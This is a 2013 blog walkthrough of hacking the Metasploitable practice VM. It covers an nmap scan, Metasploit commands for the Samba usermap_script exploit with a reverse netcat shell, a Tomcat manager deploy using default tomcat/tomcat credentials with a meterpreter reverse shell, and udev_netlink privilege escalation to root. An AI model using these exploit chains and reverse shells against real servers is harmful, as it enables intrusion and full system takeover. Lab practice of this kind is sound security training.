Saturday, November 9, 2013

Metasploitable - Walkthrough

Metasploitable is another vulnerable VM designed to practice penetration testing, and especially Metasploit. I could use manual methods like in the previous cases, but I decided to use Metasploit for the exploitation.

I started with NMAP as usual:

root@kali:~# nmap -sS -A

Starting Nmap 6.40 ( ) at 2013-11-09 21:28 CET
Nmap scan report for
Host is up (0.0022s latency).
Not shown: 988 closed ports
21/tcp   open  ftp         ProFTPD 1.3.1
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45+00:00
|_Not valid after:  2010-04-16T13:07:45+00:00
|_ssl-date: 2013-11-09T20:28:17+00:00; -2s from local time.
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid:
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
| http-methods: Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 8
| Some Capabilities: Connect with DB, Compress, SSL, Transactions, Secure Connection
| Status: Autocommit
|_Salt: V&Vbg^%8+nhCQQ"PQ%bB
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Apache Tomcat/5.5
MAC Address: 00:0C:29:0E:5C:5B (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Host:  metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP
|_  System time: 2013-11-09T15:28:17-05:00

1   2.16 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 17.00 seconds

As everything is too easy with Metasploit I will show two methods.

Method 1 - Samba

If we do a Google search for Samba 3.0.20 exploit, we run into the following webpage:

which is exactly the MSF module we need. Configuring and running MSF:

msf exploit(usermap_script) > set RHOST
msf exploit(usermap_script) > set payload cmd/unix/reverse_netcat
msf exploit(usermap_script) > set LHOST
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST     yes       The target address
   RPORT  139              yes       The target port

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST     yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(usermap_script) > exploit

[*] Started reverse handler on
[*] Command shell session 1 opened ( -> at 2013-11-09 21:46:52 +0100

python -c 'import pty;pty.spawn("/bin/bash")'
root@metasploitable:/# id
uid=0(root) gid=0(root)

As Samba was running with root privileges we are done...

Method 2 - via Tomcat Manager + UDEV Netlink local exploit

There is a Tomcat service at port 8180, and if we navigate to it we can find the default links, to the manager, admin page and so on. If we do a quick Google search we can find that the default Tomcat manager username and password are tomcat/tomcat. I tried and it really worked. Now we only need the exploit:

Here is the related MSF configration:

msf exploit(tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  tomcat           no        The password for the specified username
   PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                    no        Use a proxy chain
   RHOST     yes       The target address
   RPORT     8180             yes       The target port
   USERNAME  tomcat           no        The username to authenticate as
   VHOST                      no        HTTP server virtual host

Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST     yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(tomcat_mgr_deploy) > exploit

[*] Started reverse handler on
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6462 bytes as Yd0glyiN6vrkhM.war ...
[*] Executing /Yd0glyiN6vrkhM/Ak0iJcrqppzQUwP7xB.jsp...
[*] Undeploying Yd0glyiN6vrkhM ...
[*] Sending stage (30355 bytes) to
[*] Meterpreter session 2 opened ( -> at 2013-11-09 22:06:25 +0100

meterpreter > sysinfo
Computer    : metasploitable
OS          : Linux 2.6.24-16-server (i386)
Meterpreter : java/java
meterpreter > getuid
Server username: tomcat55

As we can see we are not root yet, but a limited tomcat55 account. Let's put meterpreter to the background ('background' command) and look for a local root exploit.

I picked up the following:

meterpreter > background
[*] Backgrounding session 3...
msf exploit(tomcat_mgr_deploy) > use exploit/linux/local/
use exploit/linux/local/hp_smhstart     use exploit/linux/local/sock_sendpage   use exploit/linux/local/zpanel_zsudo
use exploit/linux/local/kloxo_lxsuexec  use exploit/linux/local/udev_netlink   
msf exploit(tomcat_mgr_deploy) > use exploit/linux/local/udev_netlink

msf exploit(udev_netlink) > set SESSION 3
msf exploit(udev_netlink) > show options

Module options (exploit/linux/local/udev_netlink):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   NetlinkPID                    no        Usually udevd pid-1.  Meterpreter sessions will autodetect
   SESSION                       yes       The session to run this module on.
   WritableDir  /tmp             yes       A directory where we can write files (must not be mounted noexec)

Exploit target:

   Id  Name
   --  ----
   0   Linux x86

msf exploit(udev_netlink) > exploit

[*] Started reverse handler on
[*] Attempting to autodetect netlink pid...
[*] Meterpreter session, using get_processes to find netlink pid
[*] udev pid: 2991
[+] Found netlink pid: 2990
[*] Writing payload executable (259 bytes) to /tmp/IQBLahEWgL
[*] Writing exploit executable (1879 bytes) to /tmp/pGynSspMQB
[*] chmod'ing and running it...
[*] Command shell session 4 opened ( -> at 2013-11-09 22:14:30 +0100

uid=0(root) gid=0(root)

...and we are root.

There are more methods, but I will leave them to you.

No comments: